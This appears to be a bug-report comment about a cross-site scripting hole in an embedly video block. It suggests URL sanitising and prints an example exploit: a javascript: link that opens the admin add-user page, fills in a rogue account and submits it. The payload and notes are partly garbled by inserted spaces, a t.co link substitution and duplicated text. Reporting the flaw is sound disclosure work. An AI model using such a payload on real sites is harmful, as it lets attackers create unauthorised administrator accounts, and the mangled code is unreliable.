Note: I'm not sure about the 't.co' URL as that might have been converted from Twitter as it was sent via a DM.
---------------------
Things to keep in mind:
- we'd probably need to allow protocol free urls too, eg allow strings starting with 'http://', 'https://', and '://'
- sanitize the URL
- Alternatively, the sanity check could be done here:
/htdocs/blocktype/externalvideo/embed_services/embedly/embedservice.php#L61
Example exploit:
<a class=" embedly- card" href="javascript: {var TestFenster = http:// window. open('. ./admin/ users/add. php','TestWindo w','width= 800,height= 800,left= 100,top= 50');function fill() {TestWindow. adduser. username. value=' badboy' ;TestWindow. adduser. firstname. value=' Bad';TestWindow .adduser. lastname. value=' Boy';http://<email address hidden> ';TestWindow. adduser. password. value=' Secret+ 12345';https:/ /t.co/f2YTjI3B9 B();}TestWindow. addEventListene r('load' ,fill); }">open the gate</a>
Note: I'm not sure about the 't.co' URL as that might have been converted from Twitter as it was sent via a DM.
------- ------- -------
Things to keep in mind:
- we'd probably need to allow protocol free urls too, eg allow strings starting with 'http:// ', 'https:/ /', and '://' blocktype/ externalvideo/ embed_services/ embedly/ embedservice. php#L61
- sanitize the URL
- Alternatively, the sanity check could be done here:
/htdocs/